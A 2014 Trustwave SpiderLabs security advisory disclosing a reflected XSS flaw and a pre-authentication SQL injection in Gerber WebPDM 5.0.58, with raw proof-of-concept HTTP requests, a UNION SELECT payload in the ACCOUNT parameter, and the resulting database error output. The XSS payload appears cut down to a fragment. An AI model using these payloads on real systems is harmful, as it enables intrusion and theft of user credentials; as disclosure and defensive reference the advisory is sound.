Trustwave SpiderLabs Security Advisory TWSL2014-014:
Multiple Vulnerabilities in Gerber WebPDM Product Data Management System
Published: 10/24/2014
Version: 1.0
Vendor: Gerber Technology (http://www.gerbertechnology.com/)
Product: webPDM Product Data Management
Version affected: 5.0.58
Product description:
A product management solution with a web interface front-end.
Finding 1: Reflected Cross-Site Scripting
Credit: Nate Drier of Trustwave SpiderLabs
CVE:CVE-2014-6281
CWE: CWE-79
The 'txtUserName' parameter on the main login form (/Dialogs/Login/LoginStart.asp) is vulnerable to XSS.
#Request:
POST /Dialogs/Login/Login.asp HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://a.b.c.d/Dialogs/Login/LoginStart.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
txtUserName=")&txtPassword=&hdnLoginHash=&cmdLogin=Login
#Response:
");
Finding 2: SQL Injection
Credit: Nate Drier of Trustwave SpiderLabs
CVE: CVE-2014-6282
CWE: CWE-89
The ACCOUNT parameter on the VerifyLogin.asp page is vulnerable to SQL
Injection. This SQL Injection is available for attack pre-authentication.
The following POC url will run the SELECT @@VERSION query and return the
results as a CAST error:
#Request:
https://a.b.c.d/Dialogs/Login/VerifyLogin.asp?LOCALOFFSET=-240&ACCOUNT=-9999%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%2BISNULL%28CAST%28%40%40VERSION%20AS%20NVARCHAR%281000%29%29%2CNULL%29%2CNULL%2CNULL%2CNULL--%20&ACCOUNTID=a&GOTOURL=
#Response:
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int. Last Query: SELECT Email, Address, City, State, PostalCode, Country, Location, Title, WorkPhone, WorkExtension, HomePhone, FaxNumber, Notes , Password, AdministratorFlags, Licenses, IsActive, Name, LicenseType, IsOnline FROM Users WHERE UserName = 'A' AND Password = '-9999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+ISNULL(CAST(@@VERSION AS NVARCHAR(1000)),NULL),NULL,NULL,NULL-- '
While the default user does not have dba permissions, its possible to dump
all usernames and passwords (md5) for the WebPDM application itself.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for these findings. However, administers can mitigate
these vulnerabilities by applying Web Application Firewall (WAF) rules.
ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these vulnerabilities.
Communication History:
04/16/2014 - Initial notification email to vendor
04/22/2014 - Attempt to follow-up with vendor
06/05/2014 - Attempt to follow-up with vendor
06/23/2014 - Support call with Gerber Technology
07/21/2014 - Attempt to follow-up with vendor
08/26/2014 - Attempt to follow-up with vendor
10/22/2014 - Last attempt to follow-up with vendor
10/24/2014 - Advisory published
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce
security risks. With cloud and managed security services, integrated
technologies and a team of security experts, ethical hackers and
researchers, Trustwave enables businesses to transform the way they manage
their information security and compliance programs while safely embracing
business imperatives including big data, BYOD and social media. More than
2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud
platform, through which Trustwave delivers automated, efficient and
cost-effective data protection, risk management and threat intelligence.
Trustwave is a privately held company, headquartered in Chicago, with
customers in 96 countries. For more information about Trustwave, visit
www.trustwave.com.
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.